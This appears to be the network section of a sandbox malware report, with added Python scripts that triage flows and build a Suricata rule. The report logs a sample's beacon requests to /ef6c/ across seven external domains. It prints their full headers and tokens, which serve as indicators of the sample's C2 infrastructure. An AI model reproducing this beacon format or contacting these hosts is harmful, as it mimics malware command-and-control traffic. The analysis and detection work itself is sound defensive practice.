Network Analysis
TCP Requests

Source | Destination | Hostname |
---|---|---|
192.168.56.101:49206 | 172.120.106.61:80 | www.szyyglass.com |
192.168.56.101:49207 | 172.120.106.61:80 | www.szyyglass.com |
192.168.56.101:49212 | 192.0.78.24:80 | www.fis.photos |
192.168.56.101:49213 | 192.0.78.24:80 | www.fis.photos |
192.168.56.101:49208 | 194.9.94.86:80 | www.gaminghallarna.net |
192.168.56.101:49209 | 194.9.94.86:80 | www.gaminghallarna.net |
192.168.56.101:49217 | 198.54.117.244:80 | www.redelirevearyseuiop.xyz |
192.168.56.101:49218 | 198.54.117.244:80 | www.redelirevearyseuiop.xyz |
192.168.56.101:49204 | 208.91.197.27:80 | www.gicaredocs.com |
192.168.56.101:49205 | 208.91.197.27:80 | www.gicaredocs.com |
192.168.56.101:49214 | 217.70.184.50:80 | www.lafabriqueabeilleassurances.com |
192.168.56.101:49215 | 217.70.184.50:80 | www.lafabriqueabeilleassurances.com |
192.168.56.101:49210 | 34.102.136.180:80 | www.levanttradegroup.com |
192.168.56.101:49211 | 34.102.136.180:80 | www.levanttradegroup.com |
UDP Requests

Source | Destination |
---|---|
192.168.56.101:59369 | 164.124.101.2:53 |
192.168.56.101:61479 | 164.124.101.2:53 |
192.168.56.101:62324 | 164.124.101.2:53 |
192.168.56.101:137 | 192.168.56.255:137 |
192.168.56.101:138 | 192.168.56.255:138 |
192.168.56.101:49152 | 239.255.255.250:3702 |
192.168.56.101:62325 | 239.255.255.250:3702 |
192.168.56.101:62445 | 239.255.255.250:1900 |
192.168.56.101:62447 | 239.255.255.250:3702 |
192.168.56.101:62449 | 239.255.255.250:3702 |
52.231.114.183:123 | 192.168.56.101:123 |
8.8.8.8:53 | 192.168.56.101:50851 |
8.8.8.8:53 | 192.168.56.101:54056 |
8.8.8.8:53 | 192.168.56.101:55450 |
8.8.8.8:53 | 192.168.56.101:56887 |
8.8.8.8:53 | 192.168.56.101:56977 |
8.8.8.8:53 | 192.168.56.101:57460 |
8.8.8.8:53 | 192.168.56.101:59369 |
8.8.8.8:53 | 192.168.56.101:65329 |
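The TCP and UDP tables above mix three very different kinds of traffic: outbound TCP/80 connections to seven external hosts, DNS and NTP exchanges with the sandbox's resolver and time source, and NetBIOS, SSDP and WS-Discovery chatter on the local broadcast and multicast addresses. The script below is an added example (not part of the original report) that parses flow lines in the report's own "src:port dst:port hostname" form, including the extracted variant where the hostname is fused onto the destination port, normalizes direction so the analysis VM is always the local side, and buckets the rest so that only the external TCP destinations end up on a blocklist. The sandbox address 192.168.56.101 is taken from the report; the /24 broadcast assumption and the port-label table are the example's own.

```python
"""Triage sandbox TCP/UDP flow tables into blocklist candidates, infrastructure
and local discovery noise. Added example; assumptions are marked in comments."""
import ipaddress
import re
from collections import defaultdict

SANDBOX_HOST = "192.168.56.101"   # analysis VM address, taken from the report

# Well-known ports, used only to label output (constructed lookup table).
PORT_LABELS = {53: "dns", 80: "http", 123: "ntp", 137: "netbios-ns",
               138: "netbios-dgm", 1900: "ssdp", 3702: "ws-discovery"}

# "ip:port ip:port" with an optional hostname, either glued to the port
# (as in the extracted report text) or separated from it by whitespace.
FLOW_RE = re.compile(
    r"^(?P<sip>[\d.]+):(?P<sport>\d+)\s+(?P<dip>[\d.]+):(?P<dport>\d{1,5})"
    r"\s*(?P<host>[A-Za-z][\w.-]*)?\s*$")

def scope(ip):
    """multicast / broadcast / private / external. Assumes the sandbox LAN is a /24."""
    addr = ipaddress.ip_address(ip)
    if addr.is_multicast:
        return "multicast"
    if ip.endswith(".255"):              # directed broadcast of the assumed /24
        return "broadcast"
    if addr.is_private or addr.is_loopback or addr.is_link_local:
        return "private"
    return "external"

def parse_flow(line, proto):
    """Return a normalized flow dict, or None for lines not involving the sandbox VM."""
    m = FLOW_RE.match(line.strip())
    if not m:
        return None
    sip, sport, dip, dport = m["sip"], int(m["sport"]), m["dip"], int(m["dport"])
    if sip == SANDBOX_HOST:              # outbound: VM -> remote
        remote_ip, remote_port, inbound = dip, dport, False
    elif dip == SANDBOX_HOST:            # inbound: remote -> VM (e.g. a DNS reply)
        remote_ip, remote_port, inbound = sip, sport, True
    else:
        return None
    return {"proto": proto, "remote_ip": remote_ip, "remote_port": remote_port,
            "service": PORT_LABELS.get(remote_port, str(remote_port)),
            "scope": scope(remote_ip), "inbound": inbound, "host": m["host"]}

def triage(tcp_lines, udp_lines):
    """Bucket flows: external TCP (ip -> hostnames), external UDP services, local noise."""
    report = {"external_tcp": defaultdict(set), "infrastructure": set(),
              "local_noise": defaultdict(int)}
    for proto, lines in (("tcp", tcp_lines), ("udp", udp_lines)):
        for line in lines:
            f = parse_flow(line, proto)
            if f is None:
                continue
            if f["scope"] == "external" and f["proto"] == "tcp" and not f["inbound"]:
                report["external_tcp"][f["remote_ip"]].add(f["host"] or "?")
            elif f["scope"] == "external":
                report["infrastructure"].add((f["remote_ip"], f["service"]))
            else:
                report["local_noise"][(f["scope"], f["service"])] += 1
    return report

def blocklist(report):
    """Flatten external TCP destinations into sorted 'ip hostname' lines."""
    return sorted(f"{ip} {h}" for ip, hosts in report["external_tcp"].items()
                  for h in sorted(hosts))

# Flow lines copied from the report tables (constructed sample input for the demo).
TCP_FLOWS = """\
192.168.56.101:49206 172.120.106.61:80www.szyyglass.com
192.168.56.101:49207 172.120.106.61:80www.szyyglass.com
192.168.56.101:49212 192.0.78.24:80www.fis.photos
192.168.56.101:49208 194.9.94.86:80www.gaminghallarna.net
192.168.56.101:49217 198.54.117.244:80www.redelirevearyseuiop.xyz
192.168.56.101:49204 208.91.197.27:80www.gicaredocs.com
192.168.56.101:49214 217.70.184.50:80www.lafabriqueabeilleassurances.com
192.168.56.101:49210 34.102.136.180:80www.levanttradegroup.com
"""
UDP_FLOWS = """\
192.168.56.101:59369 164.124.101.2:53
192.168.56.101:137 192.168.56.255:137
192.168.56.101:138 192.168.56.255:138
192.168.56.101:49152 239.255.255.250:3702
192.168.56.101:62445 239.255.255.250:1900
52.231.114.183:123 192.168.56.101:123
8.8.8.8:53 192.168.56.101:50851
8.8.8.8:53 192.168.56.101:59369
"""

if __name__ == "__main__":
    r = triage(TCP_FLOWS.splitlines(), UDP_FLOWS.splitlines())
    print("\n".join(blocklist(r)))
    print("infrastructure:", sorted(r["infrastructure"]))
    print("local noise:", dict(r["local_noise"]))
```

Direction normalization matters here: the rows whose source is 8.8.8.8:53 or 52.231.114.183:123 are replies to the VM, and without it a naive "destination IP" extractor would miss them or, worse, list the VM itself as a destination. The broadcast and multicast rows are ordinary Windows discovery traffic and carry no indicator value.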
HTTP Requests

POST http://www.gicaredocs.com/ef6c/ (status 0, no response recorded)

Request:
POST /ef6c/ HTTP/1.1
Host: www.gicaredocs.com
Connection: close
Content-Length: 281
Cache-Control: no-cache
Origin: http://www.gicaredocs.com
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.gicaredocs.com/ef6c/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

GET http://www.gicaredocs.com/ef6c/?t8o=dQ8jXmGBocPwA167SrVCKSfe9kfjfwf5Y/UytJXCMDqauGkqvJ/2eQvfbvtaR0w7HyB9eXq/&UlX=YvIpZ (status 200)

Request:
GET /ef6c/?t8o=dQ8jXmGBocPwA167SrVCKSfe9kfjfwf5Y/UytJXCMDqauGkqvJ/2eQvfbvtaR0w7HyB9eXq/&UlX=YvIpZ HTTP/1.1
Host: www.gicaredocs.com
Connection: close

Response:
HTTP/1.1 200 OK
Date: Mon, 04 Oct 2021 01:16:12 GMT
Server: Apache
Set-Cookie: vsid=919vr3808557721213372; expires=Sat, 03-Oct-2026 01:16:12 GMT; Max-Age=157680000; path=/; domain=www.gicaredocs.com; HttpOnly
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_fLcVXRYcdJ4oIGzXlBAh/su4kcsIJR9FhrThpDcC0wR6whbQ1pzxbOxevtXfAdn4mq73951XD5GUMXMAMzLh6w==
Keep-Alive: timeout=5, max=114
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
POST http://www.szyyglass.com/ef6c/ (status 0, no response recorded)

Request:
POST /ef6c/ HTTP/1.1
Host: www.szyyglass.com
Connection: close
Content-Length: 281
Cache-Control: no-cache
Origin: http://www.szyyglass.com
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.szyyglass.com/ef6c/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

GET http://www.szyyglass.com/ef6c/?t8o=WJZ/PBlgU2sqxbhuKWSW0gAF450CRpcifwWN2Hn02+HJZd2OB2qk7jd6844pcDa/ZUIS0tAu&UlX=YvIpZ (status 200)

Request:
GET /ef6c/?t8o=WJZ/PBlgU2sqxbhuKWSW0gAF450CRpcifwWN2Hn02+HJZd2OB2qk7jd6844pcDa/ZUIS0tAu&UlX=YvIpZ HTTP/1.1
Host: www.szyyglass.com
Connection: close

Response:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 04 Oct 2021 01:16:33 GMT
Content-Type: text/html
Content-Length: 795
Connection: close
POST http://www.gaminghallarna.net/ef6c/ (status 0, no response recorded)

Request:
POST /ef6c/ HTTP/1.1
Host: www.gaminghallarna.net
Connection: close
Content-Length: 281
Cache-Control: no-cache
Origin: http://www.gaminghallarna.net
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.gaminghallarna.net/ef6c/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

GET http://www.gaminghallarna.net/ef6c/?t8o=klh7vGPfywtzHDqBe0mXtw9R4RUvLJCc3Nh/2lv7lW0muO/R44RuNcsYgcRk+/HbCIQeLGan&UlX=YvIpZ (status 200)

Request:
GET /ef6c/?t8o=klh7vGPfywtzHDqBe0mXtw9R4RUvLJCc3Nh/2lv7lW0muO/R44RuNcsYgcRk+/HbCIQeLGan&UlX=YvIpZ HTTP/1.1
Host: www.gaminghallarna.net
Connection: close

Response:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 04 Oct 2021 01:16:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.21
POST http://www.levanttradegroup.com/ef6c/ (status 405)

Request:
POST /ef6c/ HTTP/1.1
Host: www.levanttradegroup.com
Connection: close
Content-Length: 281
Cache-Control: no-cache
Origin: http://www.levanttradegroup.com
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.levanttradegroup.com/ef6c/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

Response:
HTTP/1.1 405 Not Allowed
Server: openresty
Date: Mon, 04 Oct 2021 01:16:35 GMT
Content-Type: text/html
Content-Length: 556
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_ZlSj+/gzpZAXTEtvKiA0hAH3uXWm7fUVuLGtSSdJbLuurHsJv5ZK2L5/Jj59vdxlRRuiDcnFfnKo0PCC0Big3A
Via: 1.1 google
Connection: close

GET http://www.levanttradegroup.com/ef6c/?t8o=9g8sfBGzWY6JJ+yJLDpPQys/8ShNqhTPTp4cpY8RvCwAQwKx0UrfmPEzoi+Z1D/DgpYog5qv&UlX=YvIpZ (status 403)

Request:
GET /ef6c/?t8o=9g8sfBGzWY6JJ+yJLDpPQys/8ShNqhTPTp4cpY8RvCwAQwKx0UrfmPEzoi+Z1D/DgpYog5qv&UlX=YvIpZ HTTP/1.1
Host: www.levanttradegroup.com
Connection: close

Response:
HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 04 Oct 2021 01:16:35 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6157651a-113"
Via: 1.1 google
Connection: close
POST http://www.fis.photos/ef6c/ (status 301)

Request:
POST /ef6c/ HTTP/1.1
Host: www.fis.photos
Connection: close
Content-Length: 281
Cache-Control: no-cache
Origin: http://www.fis.photos
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.fis.photos/ef6c/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

Response:
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 04 Oct 2021 01:16:45 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.fis.photos/ef6c/
X-ac: 3.nrt _bur

GET http://www.fis.photos/ef6c/?t8o=iVGcxgJZg7dDdqnpGvHyDNlE3XmNDIFvU6VDaZ8nDL6WJmv+1asF/xEbeuA1UUYS6lydoag+&UlX=YvIpZ (status 301)

Request:
GET /ef6c/?t8o=iVGcxgJZg7dDdqnpGvHyDNlE3XmNDIFvU6VDaZ8nDL6WJmv+1asF/xEbeuA1UUYS6lydoag+&UlX=YvIpZ HTTP/1.1
Host: www.fis.photos
Connection: close

Response:
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 04 Oct 2021 01:16:45 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.fis.photos/ef6c/?t8o=iVGcxgJZg7dDdqnpGvHyDNlE3XmNDIFvU6VDaZ8nDL6WJmv+1asF/xEbeuA1UUYS6lydoag+&UlX=YvIpZ
X-ac: 3.nrt _bur
POST http://www.lafabriqueabeilleassurances.com/ef6c/ (status 0, no response recorded)

Request:
POST /ef6c/ HTTP/1.1
Host: www.lafabriqueabeilleassurances.com
Connection: close
Content-Length: 281
Cache-Control: no-cache
Origin: http://www.lafabriqueabeilleassurances.com
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.lafabriqueabeilleassurances.com/ef6c/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

GET http://www.lafabriqueabeilleassurances.com/ef6c/?t8o=2QYE7mkSl4x2jlZo54GRK50GO3C76nvR62kgjEMbDIxrMKFbsYZiIeVfmB5iSiZWlGlMGs/r&UlX=YvIpZ (status 200)

Request:
GET /ef6c/?t8o=2QYE7mkSl4x2jlZo54GRK50GO3C76nvR62kgjEMbDIxrMKFbsYZiIeVfmB5iSiZWlGlMGs/r&UlX=YvIpZ HTTP/1.1
Host: www.lafabriqueabeilleassurances.com
Connection: close

Response:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 04 Oct 2021 01:16:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Vary: Accept-Language
POST http://www.redelirevearyseuiop.xyz/ef6c/ (status 0, no response recorded)

Request:
POST /ef6c/ HTTP/1.1
Host: www.redelirevearyseuiop.xyz
Connection: close
Content-Length: 281
Cache-Control: no-cache
Origin: http://www.redelirevearyseuiop.xyz
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.redelirevearyseuiop.xyz/ef6c/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

GET http://www.redelirevearyseuiop.xyz/ef6c/?t8o=+zggs108Zt88mF3I15I6Vl7MIKEVgTDkllssvVc7oGo+vC3UJFm7tcArJeeO3BpO4YdkYwbo&UlX=YvIpZ (status 0, no response recorded)

Request:
GET /ef6c/?t8o=+zggs108Zt88mF3I15I6Vl7MIKEVgTDkllssvVc7oGo+vC3UJFm7tcArJeeO3BpO4YdkYwbo&UlX=YvIpZ HTTP/1.1
Host: www.redelirevearyseuiop.xyz
Connection: close
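Every one of the seven hosts above receives the same pair of requests: a POST to /ef6c/ with a 281-byte form body, an Internet Explorer 9 User-Agent, and Origin and Referer headers that point back at the very URL being posted to, followed by a GET to /ef6c/ carrying a t8o token and a fixed UlX=YvIpZ parameter. Only the Host header and the t8o value change between domains, and the servers answer with whatever an unrelated web host would (200 with a cookie, 301 to HTTPS, 403, 405), which is the signature of a sample that rotates through a list of domains rather than talking to one known server. The script below is an added example (not part of the report) that parses raw request blocks, fingerprints them by method, path, User-Agent, Content-Length and query parameter names, reports fingerprints sent to several distinct hosts, and turns such a cluster into a Suricata rule. The request text is rebuilt from the headers printed above; the rule's sid values and classtype are placeholders of the example.

```python
"""Cluster raw HTTP requests from a sandbox report by request shape and emit a
Suricata rule for a shape that is sent to many domains. Added example."""
from collections import defaultdict
from urllib.parse import urlsplit

def parse_request(raw):
    """Parse 'METHOD target HTTP/x' plus header lines into a dict. Query values are
    left undecoded on purpose: they are opaque tokens in which '+' and '/' matter."""
    lines = [l for l in raw.strip().splitlines() if l.strip()]
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    query = dict(p.split("=", 1) if "=" in p else (p, "") for p in parts.query.split("&") if p)
    return {"method": method, "host": headers.get("host", ""), "path": parts.path,
            "query": query, "headers": headers}

def shape(req):
    """Request fingerprint that ignores the host and the token values."""
    h = req["headers"]
    return (req["method"], req["path"], h.get("user-agent", ""),
            h.get("content-length"), tuple(sorted(req["query"])))

def beacon_clusters(requests, min_domains=3):
    """Shapes sent to at least min_domains distinct hosts (the domain-rotation pattern)."""
    groups = defaultdict(list)
    for r in requests:
        groups[shape(r)].append(r)
    out = []
    for (method, path, ua, clen, params), reqs in groups.items():
        hosts = sorted({r["host"] for r in reqs})
        if len(hosts) >= min_domains:
            out.append({"method": method, "path": path, "user_agent": ua,
                        "content_length": clen, "params": list(params), "hosts": hosts})
    return out

def self_referential(req):
    """True when Origin names the Host and Referer is the request path itself,
    i.e. the 'browser' claims to have come from the page it is posting to."""
    h = req["headers"]
    return (urlsplit(h.get("origin", "")).hostname == req["host"]
            and urlsplit(h.get("referer", "")).path == req["path"])

def suricata_escape(s):
    """Hex-escape the characters that are special inside a Suricata content match."""
    for ch in "|\\\";":          # '|' first, since the escapes themselves use it
        s = s.replace(ch, f"|{ord(ch):02x}|")
    return s

def suricata_rule(c, sid):
    """Rule keyed on method, URI prefix and (if present) User-Agent of a cluster."""
    opts = [f'msg:"{c["method"]} {c["path"]} beacon seen against {len(c["hosts"])} domains"',
            "flow:established,to_server",
            f'http.method; content:"{c["method"]}"',
            f'http.uri; content:"{suricata_escape(c["path"])}"; startswith']
    if c["user_agent"]:
        opts.append(f'http.user_agent; content:"{suricata_escape(c["user_agent"])}"')
    opts += ["classtype:trojan-activity", f"sid:{sid}", "rev:1"]   # placeholder sid
    return "alert http $HOME_NET any -> $EXTERNAL_NET any (" + "; ".join(opts) + ";)"

# Header set exactly as printed in the report; only Host and the t8o token vary.
POST_TEMPLATE = """POST /ef6c/ HTTP/1.1
Host: {host}
Connection: close
Content-Length: 281
Cache-Control: no-cache
Origin: http://{host}
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://{host}/ef6c/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
"""
GET_TEMPLATE = """GET /ef6c/?t8o={token}&UlX=YvIpZ HTTP/1.1
Host: {host}
Connection: close
"""
SAMPLES = [  # (host, t8o token) pairs from the report; constructed sample input
    ("www.gicaredocs.com", "dQ8jXmGBocPwA167SrVCKSfe9kfjfwf5Y/UytJXCMDqauGkqvJ/2eQvfbvtaR0w7HyB9eXq/"),
    ("www.szyyglass.com", "WJZ/PBlgU2sqxbhuKWSW0gAF450CRpcifwWN2Hn02+HJZd2OB2qk7jd6844pcDa/ZUIS0tAu"),
    ("www.gaminghallarna.net", "klh7vGPfywtzHDqBe0mXtw9R4RUvLJCc3Nh/2lv7lW0muO/R44RuNcsYgcRk+/HbCIQeLGan"),
    ("www.levanttradegroup.com", "9g8sfBGzWY6JJ+yJLDpPQys/8ShNqhTPTp4cpY8RvCwAQwKx0UrfmPEzoi+Z1D/DgpYog5qv"),
    ("www.fis.photos", "iVGcxgJZg7dDdqnpGvHyDNlE3XmNDIFvU6VDaZ8nDL6WJmv+1asF/xEbeuA1UUYS6lydoag+"),
    ("www.lafabriqueabeilleassurances.com", "2QYE7mkSl4x2jlZo54GRK50GO3C76nvR62kgjEMbDIxrMKFbsYZiIeVfmB5iSiZWlGlMGs/r"),
    ("www.redelirevearyseuiop.xyz", "+zggs108Zt88mF3I15I6Vl7MIKEVgTDkllssvVc7oGo+vC3UJFm7tcArJeeO3BpO4YdkYwbo")]

def sample_requests():
    raw = [POST_TEMPLATE.format(host=h) for h, _ in SAMPLES]
    raw += [GET_TEMPLATE.format(host=h, token=t) for h, t in SAMPLES]
    return [parse_request(r) for r in raw]

if __name__ == "__main__":
    for i, c in enumerate(beacon_clusters(sample_requests())):
        print(c["method"], c["path"], "->", len(c["hosts"]), "hosts, params", c["params"])
        print(suricata_rule(c, 1000001 + i))
```

The fingerprint deliberately excludes the Host header and the token values, because those are the only things the sample varies; the POST cluster is the stronger signature since it also carries the fixed User-Agent, Content-Length and self-referential Origin and Referer. The GET cluster has no User-Agent at all, so the generated rule for it matches on method and URI prefix only and will need a tighter distance or a second content match before it is fit for production.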
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.101 | 164.124.101.2 | 3 (Destination Unreachable) | |
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts